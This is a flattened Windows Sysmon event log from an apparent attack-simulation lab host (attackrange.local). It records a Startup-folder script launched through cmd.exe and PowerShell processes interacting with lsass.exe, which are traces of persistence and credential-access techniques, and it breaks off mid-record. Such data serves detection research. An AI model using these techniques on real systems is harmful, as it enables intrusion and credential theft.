12:02:42.616{266CAFBE-64C5-6064-A500-00000000AE01}43566240C:\Windows\Explorer.EXE{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+99121|C:\Windows\System32\SHELL32.dll+97f86|C:\Windows\System32\SHELL32.dll+d6c91|C:\Windows\System32\SHELL32.dll+bcebe|C:\Windows\Explorer.EXE+91a26|C:\Windows\Explorer.EXE+11a0b|C:\Windows\Explorer.EXE+1187e|C:\Windows\Explorer.EXE+f7c2|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 154100x80000000000000007774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.618{266CAFBE-64E2-6064-BA00-00000000AE01}6812C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunWallpaperSetupInit.cmd" "C:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 23542300x80000000000000007773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:42.538{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=754C8D648BC1B365A18498AA9797DB0C,SHA256=5FDAD11DC2A7664618CEC52D0F3CDECD0DAD11BC31284B029832196E891E2902,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.972{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.972{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.941{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC6C73420D9D1627B68AEEB7C0A0C684,SHA256=8DDA091CE68D166B7810A32FFD74745B723FE586DA78AAD0289C14EFFFC22D51,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.925{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.925{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000007811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:02:43.832{266CAFBE-64E2-6064-BC00-00000000AE01}6860\PSHost.132616657626760604.6860.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000007810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.722{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fdakewdm.sr0.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.722{266CAFBE-64E2-6064-BC00-00000000AE01}6860ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1t5xbwh2.jc2.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.629{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8D46D974CBEA89AFE3E49ABBD629041B,SHA256=51E0E46417ADD0138151DD4E0170F127818F0446114E7DA10CD587D3670953E8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.582{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1t5xbwh2.jc2.ps12021-03-31 12:02:43.582 10341000x80000000000000007806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:43.567{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64E2-6064-BC00-00000000AE01}6860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000007844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.985{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=906C0284BA09EC137674FFA9C2782A8C,SHA256=09FC448B904390C004A74482EB1EF491008E4466ABFD642929168DA5FF48DB8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.938{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=07082D445C114B32D0BC9254530270E8,SHA256=BAE3E8351CFD30428E55AE32028163EF815FA863192FAAA56FBFA0105D4ABD64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.922{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0DCB0D7970CF1781D56EE3717162CBDB,SHA256=AEEF87976C2A116FFFA67797ED56EB2764B0E806890408D71699F34961916B01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.907{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2BC738D7BBE20A38D5E1C3E0C38D7BFB,SHA256=66C319F6F3D4AD4C08C5784E95304353719DEC88BFBDF3A63F7F5046F5763B94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.876{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AC1A2F711325EE0668B1E5FC2DD2B8BA,SHA256=ABC5C8C7271C5DF009AD545B13447C3D70B00DAA9BBAC65571F86951E2833BF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.860{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=092D8AAC47531729DAE82F6E41EFFC97,SHA256=673E3B4922DA367D59C249318D78C7BA5785F7496AA29732E3052808185006B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.829{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A00C32FCC9B86E8E7D6B21D63A4793C3,SHA256=17B0B3866081F5707B735CD1BA22CE2A11CA5DB4E9F35D318B363F3AA0B9B316,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.766{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DD9CB6DDE62301030129F4F8DF34A270,SHA256=8DFB381CD35C0ACB5A634AFA1AA6EA599DC0674B178CB121E9426C6F034E7E15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.735{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8ADE48FC6AA6432A9DA5EB7290DB5B6,SHA256=F143A88BCDAB51F6403219A5AB8B225A28004BA4118C63D9B2644DA989DAF8B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.720{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=14B2CADCE0AE819DFF440779CF58AD21,SHA256=7A301F5CADAE959651C5A3495B0AA7401C198EF18D921D8D105D0ED7114772FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000007834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.689{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3502936C4B1EB57235C14EF22BA4FC7D,SHA256=E90961C0261883B9324F31D5D43D522AD5542207281CE09E808BBC0440647451,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.657{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 23542300x80000000000000007832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.657{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=6ED1A1FD6FC9DF51015270329BB61C56,SHA256=0D48FAC0A715F9E47234501B3DB9787D361FA5110207DB3F2E4BA60B24D66FF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f9e|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000007827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DDEC85CAEE8AD1C00B10850747F42C5E,SHA256=AA8F5CB9A75FC96F95C60432F4AF1EF1F960E154BD3B6889E0E4E0C9BFFB9042,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:44.611{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 